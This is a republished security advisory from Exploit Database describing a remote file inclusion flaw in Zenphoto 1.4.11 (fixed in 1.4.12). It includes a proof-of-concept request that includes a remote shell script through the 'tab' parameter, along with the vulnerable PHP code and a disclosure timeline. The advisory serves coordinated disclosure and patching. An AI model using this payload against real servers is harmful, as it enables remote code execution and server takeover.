ZenPhoto 1.4.11 – Remote File Inclusion

• Exploit Database
• 16 阅读

• 作者： Curesec Research Team
  日期： 2016-03-17
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/39571/

• Security Advisory - Curesec Research Team
  
  1. Introduction
  
  Affected Product: Zenphoto 1.4.11
  Fixed in: 1.4.12
  Fixed Version Link: https://github.com/zenphoto/zenphoto/archive/
  zenphoto-1.4.12.zip
  Vendor Website: http://www.zenphoto.org/
  Vulnerability Type: RFI
  Remote Exploitable: Yes
  Reported to vendor: 01/29/2016
  Disclosed to03/15/2016
  public:
  Release mode: Coordinated Release
  CVE:n/a
  Credits Tim Coen of Curesec GmbH
  
  2. Overview
  
  Zenphoto is a CMS for hosting images, written in PHP. In version 1.4.11, it is
  vulnerable to remote file inclusion. An admin account is required.
  
  3. Details
  
  Description
  
  CVSS: High 8.5 AV:N/AC:M/Au:S/C:C/I:C/A:C
  
  When downloading a log file, the input is not properly sanitized, leading to
  RFI.
  
  An admin account is required, and allow_url_fopen must be set to true - which
  is the default setting.
  
  In old versions of PHP, this would additionally lead to LFI via null byte
  poisoning or path expansion, regardless of allow_url_fopen settings.
  
  Proof of Concept
  
  GET /zenphoto-zenphoto-1.4.11/zp-core/admin-logs.php?action=download_log&page=
  logs&tab=http://localhost/shell.php%3f%78%3d%69%64%26%66%6f%6f%3d&filename=
  security&XSRFToken=afd5bafed21279d837486fd2beea81f87bc29dea HTTP/1.1
  
  Code
  
  // admin-logs.php (sanitize(x, 3) only strips out tags)
  case 'download_log':
  	$zipname = sanitize($_GET['tab'], 3) . '.zip';
  	if (class_exists('ZipArchive')) {
  		$zip = new ZipArchive;
  		$zip->open($zipname, ZipArchive::CREATE);
  		$zip->addFile($file, basename($file));
  		$zip->close();
  		ob_get_clean();
  		header("Pragma: public");
  		header("Expires: 0");
  		header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
  		header("Cache-Control: private", false);
  		header("Content-Type: application/zip");
  		header("Content-Disposition: attachment; filename=" . basename($zipname) . ";" );
  		header("Content-Transfer-Encoding: binary");
  		header("Content-Length: " . filesize($zipname));
  		readfile($zipname);
  		// remove zip file from temp path
  		unlink($zipname);
  		exit;
  	} else {
  		include_once(SERVERPATH . '/' . ZENFOLDER . '/lib-zipStream.php');
  		$zip = new ZipStream($zipname);
  		$zip->add_file_from_path(internalToFilesystem(basename($file)),internalToFilesystem($file));
  		$zip->finish();
  	}
  	break;
  
  4. Solution
  
  To mitigate this issue please upgrade at least to version 1.4.12:
  
  https://github.com/zenphoto/zenphoto/archive/zenphoto-1.4.12.zip
  
  Please note that a newer version might already be available.
  
  5. Report Timeline
  
  01/29/2016 Informed Vendor about Issue
  01/29/2016 Vendor replies
  02/23/2016 Vendor sends fix for verification
  02/23/2016 Suggested improvements for attempted fix
  02/29/2016 Delayed Disclosure
  03/14/2016 Vendor releases fix
  03/15/2016 Disclosed to public
  
  
  Blog Reference:
  https://blog.curesec.com/article/blog/Zenphoto-1411-RFI-156.html
   
  --
  blog:https://blog.curesec.com
  tweet: https://twitter.com/curesec
  
  Curesec GmbH
  Curesec Research Team
  Romain-Rolland-Str 14-24
  13089 Berlin, Germany